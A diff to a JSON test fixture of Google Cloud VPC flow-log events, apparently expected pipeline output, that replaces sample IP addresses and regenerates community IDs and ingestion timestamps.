"{\"insertId\":\"1ulp77rfdvho55\",\"jsonPayload\":{\"bytes_sent\":\"252397\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33534,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.597088427Z\",\"packets_sent\":\"260\",\"reporter\":\"SRC\",\"rtt_msec\":\"311\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:06.075942176Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", "kind": "event", "start": "2019-06-14T03:40:06.075942176Z", "end": "2019-06-14T03:49:59.597088427Z", @@ -2844,10 +2844,10 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33694, "domain": "kibana", - "ip": "203.0.113.134" + "ip": "67.43.156.13" }, "source": { "address": "10.139.99.242", @@ -2861,7 +2861,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:vLK9hCfMg91TvjmTPfnw8bfG514=", + "community_id": "1:YFlTqXDJr36riIZMLbrmKhw38gg=", "bytes": 205787, "name": "default", "transport": "tcp", @@ -2884,7 +2884,7 @@ "related": { "ip": [ "10.139.99.242", - "203.0.113.134" + "67.43.156.13" ] }, "gcp": { @@ -2920,8 +2920,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868513900Z", - "original": "{\"insertId\":\"1ulp77rfdvho60\",\"jsonPayload\":{\"bytes_sent\":\"205787\",\"connection\":{\"dest_ip\":\"203.0.113.134\",\"dest_port\":33694,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565117754Z\",\"packets_sent\":\"265\",\"reporter\":\"SRC\",\"rtt_msec\":\"216\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:05.566551903Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", + "ingested": "2021-12-09T13:37:46.391314900Z", + "original": "{\"insertId\":\"1ulp77rfdvho60\",\"jsonPayload\":{\"bytes_sent\":\"205787\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33694,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565117754Z\",\"packets_sent\":\"265\",\"reporter\":\"SRC\",\"rtt_msec\":\"216\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:05.566551903Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", "kind": "event", "start": "2019-06-14T03:40:05.566551903Z", "end": "2019-06-14T03:49:59.565117754Z", @@ -2944,9 +2944,9 @@ "as": { "number": 33652 }, - "address": "203.0.113.58", + "address": "67.43.156.13", "port": 65263, - "ip": "203.0.113.58" + "ip": "67.43.156.13" }, "source": { "address": "10.139.99.242", @@ -2960,7 +2960,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:z1VfQro/CzS/3/Jcw7ACjDX47kM=", + "community_id": "1:NVPn1fsNGKIWh4nC6Og4qM8A3kY=", "bytes": 106409, "transport": "tcp", "type": "ipv4", @@ -2975,7 +2975,7 @@ "related": { "ip": [ "10.139.99.242", - "203.0.113.58" + "67.43.156.13" ] }, "gcp": { @@ -2999,8 +2999,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868517300Z", - "original": "{\"insertId\":\"1ulp77rfdvho49\",\"jsonPayload\":{\"bytes_sent\":\"106409\",\"connection\":{\"dest_ip\":\"203.0.113.58\",\"dest_port\":65263,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.220748025Z\",\"packets_sent\":\"607\",\"reporter\":\"SRC\",\"rtt_msec\":\"87\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:01.270990648Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", + "ingested": "2021-12-09T13:37:46.391318800Z", + "original": "{\"insertId\":\"1ulp77rfdvho49\",\"jsonPayload\":{\"bytes_sent\":\"106409\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":65263,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.220748025Z\",\"packets_sent\":\"607\",\"reporter\":\"SRC\",\"rtt_msec\":\"87\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:01.270990648Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", "kind": "event", "start": "2019-06-14T03:40:01.270990648Z", "end": "2019-06-14T03:49:56.220748025Z", @@ -3027,18 +3027,18 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33534, "bytes": 61242, "domain": "kibana", - "ip": "203.0.113.134", + "ip": "67.43.156.13", "packets": 356 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:pYIEYHtraTMNgdi3XDEMGSH5LV4=", + "community_id": "1:kmu70zI5WDvD+rP/FihJUhIgim4=", "bytes": 61242, "name": "default", "transport": "tcp", @@ -3060,7 +3060,7 @@ }, "related": { "ip": [ - "203.0.113.134", + "67.43.156.13", "10.139.99.242" ] }, @@ -3097,8 +3097,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868520600Z", - "original": "{\"insertId\":\"1ulp77rfdvho4t\",\"jsonPayload\":{\"bytes_sent\":\"61242\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"203.0.113.134\",\"src_port\":33534},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.597088427Z\",\"packets_sent\":\"356\",\"reporter\":\"DEST\",\"rtt_msec\":\"311\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:06.075942176Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", + "ingested": "2021-12-09T13:37:46.391322600Z", + "original": "{\"insertId\":\"1ulp77rfdvho4t\",\"jsonPayload\":{\"bytes_sent\":\"61242\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33534},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.597088427Z\",\"packets_sent\":\"356\",\"reporter\":\"DEST\",\"rtt_msec\":\"311\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:06.075942176Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", "kind": "event", "start": "2019-06-14T03:40:06.075942176Z", "end": "2019-06-14T03:49:59.597088427Z", @@ -3119,10 +3119,10 @@ "as": { "number": 15169 }, - "address": "203.0.113.101", + "address": "67.43.156.13", "port": 49680, "domain": "siem-windows", - "ip": "203.0.113.101" + "ip": "67.43.156.13" }, "source": { "address": "10.139.99.242", @@ -3136,7 +3136,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:o9OoB7tVAGCzWrss+96PmO6N0FI=", + "community_id": "1:cHKWt/bhFFzMhXHYkr/P9HZG8V0=", "bytes": 248826, "name": "windows-isolated", "transport": "tcp", @@ -3159,7 +3159,7 @@ "related": { "ip": [ "10.139.99.242", - "203.0.113.101" + "67.43.156.13" ] }, "gcp": { @@ -3195,8 +3195,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868524100Z", - "original": "{\"insertId\":\"1ulp77rfdvho68\",\"jsonPayload\":{\"bytes_sent\":\"248826\",\"connection\":{\"dest_ip\":\"203.0.113.101\",\"dest_port\":49680,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"siem-windows\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"windows-isolated\",\"vpc_name\":\"windows-isolated\"},\"end_time\":\"2019-06-14T03:49:55.705469925Z\",\"packets_sent\":\"735\",\"reporter\":\"SRC\",\"rtt_msec\":\"113\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.711043814Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", + "ingested": "2021-12-09T13:37:46.391326400Z", + "original": "{\"insertId\":\"1ulp77rfdvho68\",\"jsonPayload\":{\"bytes_sent\":\"248826\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":49680,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"siem-windows\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"windows-isolated\",\"vpc_name\":\"windows-isolated\"},\"end_time\":\"2019-06-14T03:49:55.705469925Z\",\"packets_sent\":\"735\",\"reporter\":\"SRC\",\"rtt_msec\":\"113\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.711043814Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", "kind": "event", "start": "2019-06-14T03:39:59.711043814Z", "end": "2019-06-14T03:49:55.705469925Z", @@ -3217,9 +3217,9 @@ "as": { "number": 15169 }, - "address": "192.0.2.117", + "address": "192.168.2.117", "port": 33862, - "ip": "192.0.2.117" + "ip": "192.168.2.117" }, "source": { "address": "10.87.40.76", @@ -3233,7 +3233,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:PNZTJG/Xqm+YMqKIui8nRXoLovE=", + "community_id": "1:HWHsV+dz7l0NO6OLlewyD4wOVhc=", "bytes": 1777, "transport": "tcp", "type": "ipv4", @@ -3248,7 +3248,7 @@ "related": { "ip": [ "10.87.40.76", - "192.0.2.117" + "192.168.2.117" ] }, "gcp": { @@ -3272,8 +3272,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868527300Z", - "original": "{\"insertId\":\"1ulp77rfdvho5n\",\"jsonPayload\":{\"bytes_sent\":\"1777\",\"connection\":{\"dest_ip\":\"192.0.2.117\",\"dest_port\":33862,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:46:11.779780615Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:46:11.655143526Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", + "ingested": "2021-12-09T13:37:46.391329800Z", + "original": "{\"insertId\":\"1ulp77rfdvho5n\",\"jsonPayload\":{\"bytes_sent\":\"1777\",\"connection\":{\"dest_ip\":\"192.168.2.117\",\"dest_port\":33862,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:46:11.779780615Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:46:11.655143526Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", "kind": "event", "start": "2019-06-14T03:46:11.655143526Z", "end": "2019-06-14T03:46:11.779780615Z", @@ -3296,9 +3296,9 @@ "as": { "number": 33652 }, - "address": "203.0.113.58", + "address": "67.43.156.13", "port": 65321, - "ip": "203.0.113.58" + "ip": "67.43.156.13" }, "source": { "address": "10.139.99.242", @@ -3312,7 +3312,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:bN6NKWS7CM7qV5T0FRSxEVoL53I=", + "community_id": "1:CLTnKCsx3XAJV3yhtJSs+Vn6Xsc=", "bytes": 116845, "transport": "tcp", "type": "ipv4", @@ -3327,7 +3327,7 @@ "related": { "ip": [ "10.139.99.242", - "203.0.113.58" + "67.43.156.13" ] }, "gcp": { @@ -3351,8 +3351,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868530600Z", - "original": "{\"insertId\":\"1ulp77rfdvho5l\",\"jsonPayload\":{\"bytes_sent\":\"116845\",\"connection\":{\"dest_ip\":\"203.0.113.58\",\"dest_port\":65321,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.312105537Z\",\"packets_sent\":\"594\",\"reporter\":\"SRC\",\"rtt_msec\":\"219\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.843986502Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", + "ingested": "2021-12-09T13:37:46.391334100Z", + "original": "{\"insertId\":\"1ulp77rfdvho5l\",\"jsonPayload\":{\"bytes_sent\":\"116845\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":65321,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.312105537Z\",\"packets_sent\":\"594\",\"reporter\":\"SRC\",\"rtt_msec\":\"219\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.843986502Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", "kind": "event", "start": "2019-06-14T03:39:59.843986502Z", "end": "2019-06-14T03:49:56.312105537Z", @@ -3379,18 +3379,18 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33524, "bytes": 4614, "domain": "kibana", - "ip": "203.0.113.134", + "ip": "67.43.156.13", "packets": 58 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:jUDducT3iKEBK6mG6FO1bbR/lzQ=", + "community_id": "1:6nRZDTz3kwMjD/sK6/2SvfZM7Ks=", "bytes": 4614, "name": "default", "transport": "tcp", @@ -3412,7 +3412,7 @@ }, "related": { "ip": [ - "203.0.113.134", + "67.43.156.13", "10.139.99.242" ] }, @@ -3449,8 +3449,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868533900Z", - "original": "{\"insertId\":\"1ulp77rfdvho65\",\"jsonPayload\":{\"bytes_sent\":\"4614\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"203.0.113.134\",\"src_port\":33524},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.461087350Z\",\"packets_sent\":\"58\",\"reporter\":\"DEST\",\"rtt_msec\":\"0\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:24.790136141Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", + "ingested": "2021-12-09T13:37:46.391338900Z", + "original": "{\"insertId\":\"1ulp77rfdvho65\",\"jsonPayload\":{\"bytes_sent\":\"4614\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33524},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.461087350Z\",\"packets_sent\":\"58\",\"reporter\":\"DEST\",\"rtt_msec\":\"0\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:24.790136141Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", "kind": "event", "start": "2019-06-14T03:40:24.790136141Z", "end": "2019-06-14T03:49:56.461087350Z", @@ -3471,10 +3471,10 @@ "as": { "number": 15169 }, - "address": "192.0.2.177", + "address": "192.168.2.177", "port": 60112, "domain": "suricata-iowa", - "ip": "192.0.2.177" + "ip": "192.168.2.177" }, "source": { "address": "10.139.99.242", @@ -3488,7 +3488,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:h6NgISKzvTiBXyH4aX48ebaiTiY=", + "community_id": "1:tEFDnW0zs/Y86QZ+V6iUmdJfre4=", "bytes": 50379, "name": "default", "transport": "tcp", @@ -3511,7 +3511,7 @@ "related": { "ip": [ "10.139.99.242", - "192.0.2.177" + "192.168.2.177" ] }, "gcp": { @@ -3547,8 +3547,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868537300Z", - "original": "{\"insertId\":\"1ulp77rfdvho4b\",\"jsonPayload\":{\"bytes_sent\":\"50379\",\"connection\":{\"dest_ip\":\"192.0.2.177\",\"dest_port\":60112,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-central1\",\"vm_name\":\"suricata-iowa\",\"zone\":\"us-central1-a\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:18.224268993Z\",\"packets_sent\":\"130\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:14.031541248Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", + "ingested": "2021-12-09T13:37:46.391344Z", + "original": 